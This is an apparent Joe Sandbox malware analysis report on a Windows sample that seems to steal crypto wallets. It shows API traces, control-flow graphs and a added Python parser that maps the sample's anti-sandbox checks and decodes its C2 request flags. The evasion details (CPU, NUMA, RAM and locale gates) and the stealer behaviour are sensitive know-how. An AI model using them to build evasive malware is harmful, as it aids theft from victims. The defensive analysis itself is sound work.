call e7ab10 1169->1178 1198 e75c66-e75c71 Sleep 1170->1198 1199 e75c78-e75ce1 call e7abb0 call e7ab30 * 2 call e616b0 call e7ab10 * 4 call e61670 call e61550 1170->1199 1177->1170 1275 e75b9a-e75bda call e7aab0 call e61590 call e75440 call e7abb0 call e7ab10 1177->1275 1178->1170 1198->1106 1199->1269 1246->1143 1275->1170
                                  APIs
                                    • Part of subcall function 00E7AB30: lstrlen.KERNEL32(UO,?,?,00E64F55,00E80DDF), ref: 00E7AB3B
                                    • Part of subcall function 00E7AB30: lstrcpy.KERNEL32(00E80DDF,00000000), ref: 00E7AB95
                                    • Part of subcall function 00E7AA50: lstrcpy.KERNEL32(00E80E1A,00000000), ref: 00E7AA98
                                  • StrCmpCA.SHLWAPI(00000000,ERROR,00000000), ref: 00E75894
                                  • StrCmpCA.SHLWAPI(00000000,ERROR), ref: 00E758F1
                                  • StrCmpCA.SHLWAPI(00000000,ERROR), ref: 00E75AA7
                                    • Part of subcall function 00E7AAB0: lstrcpy.KERNEL32(?,00000000), ref: 00E7AAF6
                                    • Part of subcall function 00E75440: StrCmpCA.SHLWAPI(00000000,ERROR), ref: 00E75478
                                    • Part of subcall function 00E7ABB0: lstrcpy.KERNEL32(?,00E80E1A), ref: 00E7AC15
                                    • Part of subcall function 00E75510: StrCmpCA.SHLWAPI(00000000,ERROR,00000000), ref: 00E75568
                                    • Part of subcall function 00E75510: lstrlen.KERNEL32(00000000), ref: 00E7557F
                                    • Part of subcall function 00E75510: StrStrA.SHLWAPI(00000000,00000000), ref: 00E755B4
                                    • Part of subcall function 00E75510: lstrlen.KERNEL32(00000000), ref: 00E755D3
                                    • Part of subcall function 00E75510: lstrlen.KERNEL32(00000000), ref: 00E755FE
                                  • StrCmpCA.SHLWAPI(00000000,ERROR,00000000), ref: 00E759DB
                                  • StrCmpCA.SHLWAPI(00000000,ERROR,00000000), ref: 00E75B90
                                  • StrCmpCA.SHLWAPI(00000000,ERROR), ref: 00E75C5C
                                  • Sleep.KERNEL32(0000EA60), ref: 00E75C6B
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2113924425.0000000000E61000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E60000, based on PE: true
                                  • Associated: 00000000.00000002.2113912243.0000000000E60000.00000004.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2113924425.0000000000E8C000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2113924425.0000000000F9D000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2113924425.0000000000FA9000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2113924425.0000000000FCE000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2113924425.0000000001136000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2114111688.000000000114A000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2114111688.00000000012D0000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2114111688.00000000013B3000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2114111688.00000000013D9000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2114111688.00000000013E0000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2114111688.00000000013EF000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2114342226.00000000013F0000.00000080.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2114468159.0000000001592000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2114503713.0000000001593000.00000080.00000001.01000000.00000003.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_e60000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: lstrcpylstrlen$Sleep
                                  • String ID: ERROR$ERROR$ERROR$ERROR$ERROR$ERROR
                                  • API String ID: 507064821-2791005934
                                  • Opcode ID: 9f0c51adf5e0cf4d22b6ec5252113bc42c727455bcae78db6f3e948fd63f85c6
                                  • Instruction ID: e3269194ac274d79e7f8100f73d279a752bd14089aeffb5ff6d8b865431da5ed
                                  • Opcode Fuzzy Hash: 9f0c51adf5e0cf4d22b6ec5252113bc42c727455bcae78db6f3e948fd63f85c6
                                  • Instruction Fuzzy Hash: DBE152729101049ACB18FBA0ED62EED73BDAF94340F54E578B51E76085EF706B48CB62

                                  Control-flow Graph

                                  control_flow_graph 1301 e719f0-e71a1d call e7ade0 StrCmpCA 1304 e71a27-e71a41 call e7ade0 1301->1304 1305 e71a1f-e71a21 ExitProcess 1301->1305 1309 e71a44-e71a48 1304->1309 1310 e71c12-e71c1d call e7ab10 1309->1310 1311 e71a4e-e71a61 1309->1311 1313 e71a67-e71a6a 1311->1313 1314 e71bee-e71c0d 1311->1314 1316 e71a85-e71a94 call e7ab30 1313->1316 1317 e71b63-e71b74 StrCmpCA 1313->1317 1318 e71b82-e71b93 StrCmpCA 1313->1318 1319 e71b41-e71b52 StrCmpCA 1313->1319 1320 e71ba1-e71bb2 StrCmpCA 1313->1320 1321 e71bc0-e71bd1 StrCmpCA 1313->1321 1322 e71acf-e71ae0 StrCmpCA 1313->1322 1323 e71aad-e71abe StrCmpCA 1313->1323 1324 e71a71-e71a80 call e7ab30 1313->1324 1325 e71b1f-e71b30 StrCmpCA 1313->1325 1326 e71bdf-e71be9 call e7ab30 1313->1326 1327 e71afd-e71b0e StrCmpCA 1313->1327 1328 e71a99-e71aa8 call e7ab30 1313->1328 1314->1309 1316->1314 1339 e71b76-e71b79 1317->1339 1340 e71b80 1317->1340 1341 e71b95-e71b98 1318->1341 1342 e71b9f 1318->1342 1337 e71b54-e71b57 1319->1337 1338 e71b5e 1319->1338 1343 e71bb4-e71bb7 1320->1343 1344 e71bbe 1320->1344 1346 e71bd3-e71bd6 1321->1346 1347 e71bdd 1321->1347 1331 e71ae2-e71aec 1322->1331 1332 e71aee-e71af1 1322->1332 1329 e71ac0-e71ac3 1323->1329 1330 e71aca 1323->1330 1324->1314 1335 e71b32-e71b35 1325->1335 1336 e71b3c 1325->1336 1326->1314 1333 e71b10-e71b13 1327->1333 1334 e71b1a 1327->1334 1328->1314 1329->1330 1330->1314 1352 e71af8 1331->1352 1332->1352 1333->1334 1334->1314 1335->1336 1336->1314 1337->1338 1338->1314 1339->1340 1340->1314 1341->1342 1342->1314 1343->1344 1344->1314 1346->1347 1347->1314 1352->1314
                                  APIs
                                  • StrCmpCA.SHLWAPI(00000000,block), ref: 00E71A15
                                  • ExitProcess.KERNEL32 ref: 00E71A21
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2113924425.0000000000E61000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E60000, based on PE: true
                                  • Associated: 00000000.00000002.2113912243.0000000000E60000.00000004.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2113924425.0000000000E8C000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2113924425.0000000000F9D000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2113924425.0000000000FA9000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2113924425.0000000000FCE000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2113924425.0000000001136000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2114111688.000000000114A000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2114111688.00000000012D0000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2114111688.00000000013B3000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2114111688.00000000013D9000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2114111688.00000000013E0000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2114111688.00000000013EF000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2114342226.00000000013F0000.00000080.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2114468159.0000000001592000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2114503713.0000000001593000.00000080.00000001.01000000.00000003.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_e60000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: ExitProcess
                                  • String ID: block
                                  • API String ID: 621844428-2199623458
                                  • Opcode ID: 72555c330d295db9060b80c8178955c1aa97b3ead51cae7996b433dc91f5dd19
                                  • Instruction ID: 778222cd541c28b450d0038f24d4f37660c3fd27a6a01d88a6bd98ed37a0b87b
                                  • Opcode Fuzzy Hash: 72555c330d295db9060b80c8178955c1aa97b3ead51cae7996b433dc91f5dd19
                                  • Instruction Fuzzy Hash: 7F5170B4A0830AEFDB54DFE8D954AEE77B9EF44704F109098E41ABB284E770E944CB51

                                  Control-flow Graph

                                  APIs
                                    • Part of subcall function 00E79BB0: GetProcAddress.KERNEL32(75900000,017306D8), ref: 00E79BF1
                                    • Part of subcall function 00E79BB0: GetProcAddress.KERNEL32(75900000,01730798), ref: 00E79C0A
                                    • Part of subcall function 00E79BB0: GetProcAddress.KERNEL32(75900000,017306A8), ref: 00E79C22
                                    • Part of subcall function 00E79BB0: GetProcAddress.KERNEL32(75900000,01730708), ref: 00E79C3A
                                    • Part of subcall function 00E79BB0: GetProcAddress.KERNEL32(75900000,01730558), ref: 00E79C53
                                    • Part of subcall function 00E79BB0: GetProcAddress.KERNEL32(75900000,01738958), ref: 00E79C6B
                                    • Part of subcall function 00E79BB0: GetProcAddress.KERNEL32(75900000,017258E8), ref: 00E79C83
                                    • Part of subcall function 00E79BB0: GetProcAddress.KERNEL32(75900000,01725AE8), ref: 00E79C9C
                                    • Part of subcall function 00E79BB0: GetProcAddress.KERNEL32(75900000,01730678), ref: 00E79CB4
                                    • Part of subcall function 00E79BB0: GetProcAddress.KERNEL32(75900000,01730720), ref: 00E79CCC
                                    • Part of subcall function 00E79BB0: GetProcAddress.KERNEL32(75900000,01730738), ref: 00E79CE5
                                    • Part of subcall function 00E79BB0: GetProcAddress.KERNEL32(75900000,017307B0), ref: 00E79CFD
                                    • Part of subcall function 00E79BB0: GetProcAddress.KERNEL32(75900000,01725B48), ref: 00E79D15
                                    • Part of subcall function 00E79BB0: GetProcAddress.KERNEL32(75900000,017307E0), ref: 00E79D2E
                                    • Part of subcall function 00E7AA50: lstrcpy.KERNEL32(00E80E1A,00000000), ref: 00E7AA98
                                    • Part of subcall function 00E611D0: ExitProcess.KERNEL32 ref: 00E61211
                                    • Part of subcall function 00E61160: GetSystemInfo.KERNEL32(?), ref: 00E6116A
                                    • Part of subcall function 00E61160: ExitProcess.KERNEL32 ref: 00E6117E
                                    • Part of subcall function 00E61110: GetCurrentProcess.KERNEL32(00000000,000007D0,00003000,00000040,00000000), ref: 00E6112B
                                    • Part of subcall function 00E61110: VirtualAllocExNuma.KERNEL32(00000000), ref: 00E61132
                                    • Part of subcall function 00E61110: ExitProcess.KERNEL32 ref: 00E61143
                                    • Part of subcall function 00E61220: GlobalMemoryStatusEx.KERNEL32(00000040,?,00000000,00000040), ref: 00E6123E
                                    • Part of subcall function 00E61220: __aulldiv.LIBCMT ref: 00E61258
                                    • Part of subcall function 00E61220: __aulldiv.LIBCMT ref: 00E61266
                                    • Part of subcall function 00E61220: ExitProcess.KERNEL32 ref: 00E61294
                                    • Part of subcall function 00E76A10: GetUserDefaultLangID.KERNEL32 ref: 00E76A14
                                    • Part of subcall function 00E61190: ExitProcess.KERNEL32 ref: 00E611C6
                                    • Part of subcall function 00E779E0: GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,00E611B7), ref: 00E77A10
                                    • Part of subcall function 00E779E0: RtlAllocateHeap.NTDLL(00000000), ref: 00E77A17
                                    • Part of subcall function 00E779E0: GetUserNameA.ADVAPI32(00000104,00000104), ref: 00E77A2F
                                    • Part of subcall function 00E77A70: GetProcessHeap.KERNEL32(00000000,00000104), ref: 00E77AA0
                                    • Part of subcall function 00E77A70: RtlAllocateHeap.NTDLL(00000000), ref: 00E77AA7
                                    • Part of subcall function 00E77A70: GetComputerNameA.KERNEL32(?,00000104), ref: 00E77ABF
                                    • Part of subcall function 00E7ACC0: lstrlen.KERNEL32(?,01738AF8,?,\Monero\wallet.keys,00E80E1A), ref: 00E7ACD5
                                    • Part of subcall function 00E7ACC0: lstrcpy.KERNEL32(00000000), ref: 00E7AD14
                                    • Part of subcall function 00E7ACC0: lstrcat.KERNEL32(00000000,00000000), ref: 00E7AD22
                                    • Part of subcall function 00E7ABB0: lstrcpy.KERNEL32(?,00E80E1A), ref: 00E7AC15
                                  • OpenEventA.KERNEL32(001F0003,00000000,00000000,00000000,?,01738828,?,00E810F4,?,00000000,?,00E810F8,?,00000000,00E80AF3), ref: 00E76D6A
                                  • CreateEventA.KERNEL32(00000000,00000000,00000000,00000000), ref: 00E76D88
                                  • CloseHandle.KERNEL32(00000000), ref: 00E76D99
                                  • Sleep.KERNEL32(00001770), ref: 00E76DA4
                                  • CloseHandle.KERNEL32(?,00000000,?,01738828,?,00E810F4,?,00000000,?,00E810F8,?,00000000,00E80AF3), ref: 00E76DBA
                                  • ExitProcess.KERNEL32 ref: 00E76DC2
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2113924425.0000000000E61000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E60000, based on PE: true
                                  Similarity
                                  • API ID: AddressProc$Process$Exit$Heap$lstrcpy$AllocateCloseEventHandleNameUser__aulldiv$AllocComputerCreateCurrentDefaultGlobalInfoLangMemoryNumaOpenSleepStatusSystemVirtuallstrcatlstrlen
                                  • String ID:
                                  • API String ID: 2525456742-0
                                  • Opcode ID: 63e4bf9fe0920e674e8c3937ef24747bf46a30c3d35207cfcae9ae7726c38e52
                                  • Instruction ID: c9a4d24fed48b24e598a9c542349512199ccf13575d6c5b83efcbe0a5ffba717
                                  • Opcode Fuzzy Hash: 63e4bf9fe0920e674e8c3937ef24747bf46a30c3d35207cfcae9ae7726c38e52
                                  • Instruction Fuzzy Hash: 6C314F71A40208ABDB15F7F0DC67AEE73B9AF40340F18A968F21AB6186DF705905C762

                                  Control-flow Graph

                                   • Blocks and edges recovered from the graph data (the executed / not executed colouring of the original image is not recoverable):
                                   • 1436: e61220-e61247, call e78b40, GlobalMemoryStatusEx -> 1439, 1440
                                   • 1440: e61249-e61271, call e7dd30 (x2) -> 1442
                                   • 1439: e61273-e6127a -> 1442
                                   • 1442: e61281-e61285 -> 1444, 1445
                                   • 1444: e61287 -> 1447, 1448
                                   • 1448: e61289-e61290 -> 1445, 1447
                                   • 1447: e61292-e61294, ExitProcess
                                   • 1445: e6129a-e6129d
                                   • Structure: GlobalMemoryStatusEx at 00E6123E (dwLength 0x40 = sizeof(MEMORYSTATUSEX)), the two __aulldiv calls at 00E61258/00E61266 in block 1440 scaling a 64-bit total, then compares in 1442/1444/1448 that either fall through to 1445 or reach ExitProcess in 1447. Consistent with a minimum physical-memory check that exits inside small analysis VMs; the threshold compared against is not visible in the trace.
                                  APIs
                                  • GlobalMemoryStatusEx.KERNEL32(00000040,?,00000000,00000040), ref: 00E6123E
                                  • __aulldiv.LIBCMT ref: 00E61258
                                  • __aulldiv.LIBCMT ref: 00E61266
                                  • ExitProcess.KERNEL32 ref: 00E61294
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2113924425.0000000000E61000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E60000, based on PE: true
                                  Similarity
                                  • API ID: __aulldiv$ExitGlobalMemoryProcessStatus
                                  • String ID: @
                                  • API String ID: 3404098578-2766056989
                                  • Opcode ID: ce9e693353dbde043469b082f8d70f90096361f442ae88079ddaebab0fbf8cea
                                  • Instruction ID: ccc1d772336c81f573738f0c6fa78f883969fdc9f2fd7c57b7eaea7e506dc839
                                  • Opcode Fuzzy Hash: ce9e693353dbde043469b082f8d70f90096361f442ae88079ddaebab0fbf8cea
                                  • Instruction Fuzzy Hash: B201A2F0D80308FADB10DFE0DC4AB9DBBB8EF10705F149888E704B61D0C67455459758

                                  Control-flow Graph

                                   • Blocks and edges recovered from the graph data (the executed / not executed colouring of the original image is not recoverable):
                                   • 1454: e76d5a-e76d77, call e7ade0, OpenEventA -> 1460, 1461
                                   • 1460: e76d95-e76da4, CloseHandle, Sleep -> 1451
                                   • 1450: e76d93 -> 1451
                                   • 1451: e76daa -> 1453, 1454
                                   • 1461: e76d79-e76d91, call e7ade0, CreateEventA -> 1453
                                   • 1453: e76dac-e76dc2, call e76bc0, call e75d60, CloseHandle, ExitProcess
                                   • Structure: OpenEventA(0x001F0003 = EVENT_ALL_ACCESS, ...) after a call to e7ade0. If the open succeeds: CloseHandle, Sleep(0x1770 = 6000 ms), then 1451 either retries OpenEventA (1454) or continues to 1453. If it fails: CreateEventA, then the two worker calls e76bc0 and e75d60, CloseHandle and ExitProcess. Consistent with a single-instance wait on a named event, polled every 6 seconds.
                                  APIs
                                  • OpenEventA.KERNEL32(001F0003,00000000,00000000,00000000,?,01738828,?,00E810F4,?,00000000,?,00E810F8,?,00000000,00E80AF3), ref: 00E76D6A
                                  • CreateEventA.KERNEL32(00000000,00000000,00000000,00000000), ref: 00E76D88
                                  • CloseHandle.KERNEL32(00000000), ref: 00E76D99
                                  • Sleep.KERNEL32(00001770), ref: 00E76DA4
                                  • CloseHandle.KERNEL32(?,00000000,?,01738828,?,00E810F4,?,00000000,?,00E810F8,?,00000000,00E80AF3), ref: 00E76DBA
                                  • ExitProcess.KERNEL32 ref: 00E76DC2
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2113924425.0000000000E61000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E60000, based on PE: true
                                  Similarity
                                  • API ID: CloseEventHandle$CreateExitOpenProcessSleep
                                  • String ID:
                                  • API String ID: 941982115-0
                                  • Opcode ID: e4847902ebe14e7a058a870c8558b5e0883f5eaa3466bc325715d1db67d2fb36
                                  • Instruction ID: 7ac00d4d5d9b29f36fdc623ff7d5996b3d926e5b33afcb4275bb951bf9bb7bb8
                                  • Opcode Fuzzy Hash: e4847902ebe14e7a058a870c8558b5e0883f5eaa3466bc325715d1db67d2fb36
                                  • Instruction Fuzzy Hash: 18F05E70A48609ABEB34FBA0DC0ABBE33B4AF04709F149525F62AB51C9CBB05940DB51

                                  Control-flow Graph

                                  APIs
                                  • lstrlen.KERNEL32(00000000,00000000,0000003C), ref: 00E64889
                                  • InternetCrackUrlA.WININET(00000000,00000000), ref: 00E64899
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2113924425.0000000000E61000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E60000, based on PE: true
                                  Similarity
                                  • API ID: CrackInternetlstrlen
                                  • String ID: <
                                  • API String ID: 1274457161-4251816714
                                  • Opcode ID: 6d6fdd257683de100d845de2721af1dfdf8f0f5e37608186108dc42aca92e622
                                  • Instruction ID: 75b63ae326a6adeb7d04a94d2ec2a0291b899dfdcbfc32a0a883f48950e38d9b
                                  • Opcode Fuzzy Hash: 6d6fdd257683de100d845de2721af1dfdf8f0f5e37608186108dc42aca92e622
                                  • Instruction Fuzzy Hash: 1C213EB1D00209ABDF14DFA5EC46ADD7BB5BB44320F109625F925B72D0DB706A09CB91

                                  Control-flow Graph

                                  APIs
                                    • Part of subcall function 00E7AAB0: lstrcpy.KERNEL32(?,00000000), ref: 00E7AAF6
                                    • Part of subcall function 00E662D0: InternetOpenA.WININET(00E80DFF,00000001,00000000,00000000,00000000), ref: 00E66331
                                    • Part of subcall function 00E662D0: StrCmpCA.SHLWAPI(?,0173E308), ref: 00E66353
                                    • Part of subcall function 00E662D0: InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 00E66385
                                    • Part of subcall function 00E662D0: HttpOpenRequestA.WININET(00000000,GET,?,0173DAB0,00000000,00000000,00400100,00000000), ref: 00E663D5
                                    • Part of subcall function 00E662D0: InternetSetOptionA.WININET(00000000,0000001F,?,00000004), ref: 00E6640F
                                    • Part of subcall function 00E662D0: HttpSendRequestA.WININET(00000000,00000000,00000000,00000000,00000000), ref: 00E66421
                                  • StrCmpCA.SHLWAPI(00000000,ERROR), ref: 00E75478
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2113924425.0000000000E61000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E60000, based on PE: true
                                  Similarity
                                  • API ID: Internet$HttpOpenRequest$ConnectOptionSendlstrcpy
                                  • String ID: ERROR$ERROR
                                  • API String ID: 3287882509-2579291623
                                  • Opcode ID: 110791a1e06b7b58ccf5152935c7acfb739454086e638cbdee6108ba26b8486f
                                  • Instruction ID: 1f0956911ae35c67a9218a939ead396c438e688275d3516de53cd204757cf677
                                  • Opcode Fuzzy Hash: 110791a1e06b7b58ccf5152935c7acfb739454086e638cbdee6108ba26b8486f
                                  • Instruction Fuzzy Hash: 0711F1319101089BCB14FFA4DD52AED73B99F90340F549578F91E67492EF30AB05C751
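Added example (not Joe Sandbox output and not code from the sample): a Python parser over the API trace lines of the initialisation function above (own calls OpenEventA..ExitProcess at 00E76D6A..00E76DC2 plus its listed subcalls) and of the C2 request function (StrCmpCA at 00E75478). It pairs each environment probe (GetSystemInfo, VirtualAllocExNuma, GlobalMemoryStatusEx, GetUserDefaultLangID) with the ExitProcess that follows it, reads the VirtualAllocExNuma parameters from the stack snapshot the report prints against GetCurrentProcess, and decodes the WinINet flags of the C2 GET. The label 00E76D5A for the host function is an assumption (the report does not name it, so its first basic block is used); the symbolic constant names are the standard Windows SDK values for the hex arguments shown on the page.

```python
"""Added example, not Joe Sandbox's or the sample's code: parse the per-function
API trace lines of this report, pair each environment probe with the ExitProcess
that gates it, and decode the raw constants the calls were made with."""
import re
from collections import OrderedDict

# Trace lines quoted from this report's initialisation function. Lines without a
# "Part of subcall" prefix are the function's own calls; "00E76D5A" (its first
# basic block) is an assumed label for it, the report does not name it.
INIT_TRACE = r"""
• Part of subcall function 00E7AA50: lstrcpy.KERNEL32(00E80E1A,00000000), ref: 00E7AA98
• Part of subcall function 00E611D0: ExitProcess.KERNEL32 ref: 00E61211
• Part of subcall function 00E61160: GetSystemInfo.KERNEL32(?), ref: 00E6116A
• Part of subcall function 00E61160: ExitProcess.KERNEL32 ref: 00E6117E
• Part of subcall function 00E61110: GetCurrentProcess.KERNEL32(00000000,000007D0,00003000,00000040,00000000), ref: 00E6112B
• Part of subcall function 00E61110: VirtualAllocExNuma.KERNEL32(00000000), ref: 00E61132
• Part of subcall function 00E61110: ExitProcess.KERNEL32 ref: 00E61143
• Part of subcall function 00E61220: GlobalMemoryStatusEx.KERNEL32(00000040,?,00000000,00000040), ref: 00E6123E
• Part of subcall function 00E61220: __aulldiv.LIBCMT ref: 00E61258
• Part of subcall function 00E61220: ExitProcess.KERNEL32 ref: 00E61294
• Part of subcall function 00E76A10: GetUserDefaultLangID.KERNEL32 ref: 00E76A14
• Part of subcall function 00E61190: ExitProcess.KERNEL32 ref: 00E611C6
• Part of subcall function 00E77A70: GetComputerNameA.KERNEL32(?,00000104), ref: 00E77ABF
• OpenEventA.KERNEL32(001F0003,00000000,00000000,00000000,?,01738828,?,00E810F4,?,00000000,?,00E810F8,?,00000000,00E80AF3), ref: 00E76D6A
• CreateEventA.KERNEL32(00000000,00000000,00000000,00000000), ref: 00E76D88
• Sleep.KERNEL32(00001770), ref: 00E76DA4
• ExitProcess.KERNEL32 ref: 00E76DC2
"""
# Trace lines quoted from the C2 request function (own call StrCmpCA at 00E75478).
C2_TRACE = r"""
• Part of subcall function 00E662D0: InternetOpenA.WININET(00E80DFF,00000001,00000000,00000000,00000000), ref: 00E66331
• Part of subcall function 00E662D0: InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 00E66385
• Part of subcall function 00E662D0: HttpOpenRequestA.WININET(00000000,GET,?,0173DAB0,00000000,00000000,00400100,00000000), ref: 00E663D5
• Part of subcall function 00E662D0: InternetSetOptionA.WININET(00000000,0000001F,?,00000004), ref: 00E6640F
• Part of subcall function 00E662D0: HttpSendRequestA.WININET(00000000,00000000,00000000,00000000,00000000), ref: 00E66421
• StrCmpCA.SHLWAPI(00000000,ERROR), ref: 00E75478
"""
LINE_RE = re.compile(
    r"^•\s*(?:Part of subcall function (?P<sub>[0-9A-F]{8}):\s*)?"
    r"(?P<api>\w+)\.(?P<mod>\w+)(?:\((?P<args>[^)]*)\))?,?\s*ref:\s*(?P<ref>[0-9A-F]{8})$")

def parse_trace(text, host):
    """Map function address -> [(api, [args], call site)] in page order."""
    funcs = OrderedDict()
    for raw in text.strip().splitlines():
        m = LINE_RE.match(raw.strip())
        if not m:
            raise ValueError("unrecognised trace line: " + raw)
        args = [a for a in (m.group("args") or "").split(",") if a]
        funcs.setdefault(m.group("sub") or host, []).append((m.group("api"), args, m.group("ref")))
    return funcs

# Probe APIs whose result this sample inspects before deciding whether to exit.
PROBES = {"GetSystemInfo": "processor count", "VirtualAllocExNuma": "NUMA allocation",
          "GlobalMemoryStatusEx": "physical RAM", "GetUserDefaultLangID": "user locale"}

def find_exit_gates(funcs):
    """Pair each probe with the ExitProcess reachable after it: in the same
    function, or in the next traced function when that is a bare ExitProcess
    stub (the locale probe at 00E76A10 is followed by stub 00E61190)."""
    gates, items = [], list(funcs.items())
    for i, (fn, calls) in enumerate(items):
        probes = [api for api, _, _ in calls if api in PROBES]
        exits = [ref for api, _, ref in calls if api == "ExitProcess"]
        if probes and not exits and i + 1 < len(items):
            nxt = items[i + 1][1]
            if all(api == "ExitProcess" for api, _, _ in nxt):
                exits = [ref for _, _, ref in nxt]
        gates += [(fn, api, PROBES[api], exits[-1] if exits else None) for api in probes]
    return gates

def decode_flags(value, table):
    """Expand a bitmask into symbolic names; bits not in the table stay as hex."""
    names = [name for bit, name in table.items() if (value & bit) == bit]
    rest = value & ~sum(table)
    return names + ([hex(rest)] if rest else [])

MEM_FLAGS = {0x1000: "MEM_COMMIT", 0x2000: "MEM_RESERVE"}
PAGE_PROT = {0x40: "PAGE_EXECUTE_READWRITE"}
INET_FLAGS = {0x00400000: "INTERNET_FLAG_KEEP_CONNECTION", 0x00000100: "INTERNET_FLAG_PRAGMA_NOCACHE",
              0x00800000: "INTERNET_FLAG_SECURE", 0x00200000: "INTERNET_FLAG_NO_AUTO_REDIRECT"}

def numa_probe_params(funcs):
    """GetCurrentProcess takes no arguments, so the values the report prints for
    it are the stack already built for VirtualAllocExNuma: lpAddress, dwSize,
    flAllocationType, flProtect, nndPreferred (hProcess is pushed last)."""
    for api, args, _ in funcs["00E61110"]:
        if api == "GetCurrentProcess":
            size, alloc, prot = (int(a, 16) for a in args[1:4])
            return {"size": size, "alloc": decode_flags(alloc, MEM_FLAGS),
                    "protect": decode_flags(prot, PAGE_PROT)}
    return None

def c2_request_profile(funcs):
    """Recover verb, HttpOpenRequestA flags, the InternetSetOptionA option
    (0x1F = INTERNET_OPTION_SECURITY_FLAGS) and the post-send reply check."""
    calls = {api: args for api, args, _ in sum(funcs.values(), [])}
    return {"verb": calls["HttpOpenRequestA"][1],
            "flags": decode_flags(int(calls["HttpOpenRequestA"][6], 16), INET_FLAGS),
            "set_option": int(calls["InternetSetOptionA"][1], 16),
            "response_check": calls["StrCmpCA"][1]}

if __name__ == "__main__":
    init = parse_trace(INIT_TRACE, "00E76D5A")
    for fn, api, what, exit_ref in find_exit_gates(init):
        print(f"{fn}: {api} ({what}) -> ExitProcess at {exit_ref}")
    print(numa_probe_params(init))
    print(c2_request_profile(parse_trace(C2_TRACE, "00E75478")))
```

Run stand-alone it lists the four gates (processor count at 00E6117E, NUMA allocation at 00E61143, physical RAM at 00E61294, locale via the stub at 00E611C6), the allocation the NUMA probe asks for (0x7D0 bytes, MEM_COMMIT|MEM_RESERVE, PAGE_EXECUTE_READWRITE, preferred node 0) and the request profile (GET with INTERNET_FLAG_KEEP_CONNECTION|INTERNET_FLAG_PRAGMA_NOCACHE, INTERNET_OPTION_SECURITY_FLAGS set before HttpSendRequestA, reply compared against "ERROR"). The values the sample compares the probes against are not in the trace, so the parser reports where each gate is, not what passes it; for sandbox tuning that is still the list of properties the VM must look normal on.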
                                  APIs
                                  • GetProcessHeap.KERNEL32(00000000,00000104), ref: 00E77AA0
                                  • RtlAllocateHeap.NTDLL(00000000), ref: 00E77AA7
                                  • GetComputerNameA.KERNEL32(?,00000104), ref: 00E77ABF
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2113924425.0000000000E61000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E60000, based on PE: true
                                  Similarity
                                  • API ID: Heap$AllocateComputerNameProcess
                                  • String ID:
                                  • API String ID: 1664310425-0
                                  • Opcode ID: e0ba56827a2d5f02281401a404824a707ed5b376ea38bd684454fa70f8561a5b
                                  • Instruction ID: f2c743deda951be01c840cbbb3a36ea0675980d0c541881de4332e9de75f1e9c
                                  • Opcode Fuzzy Hash: e0ba56827a2d5f02281401a404824a707ed5b376ea38bd684454fa70f8561a5b
                                  • Instruction Fuzzy Hash: 8401A2B1908209ABD714CF88D845BAEBBB8FB04710F100229F519B2280D3B45A00C7A1
                                  APIs
                                  • GetCurrentProcess.KERNEL32(00000000,000007D0,00003000,00000040,00000000), ref: 00E6112B
                                  • VirtualAllocExNuma.KERNEL32(00000000), ref: 00E61132
                                  • ExitProcess.KERNEL32 ref: 00E61143
                                  Memory Dump Source
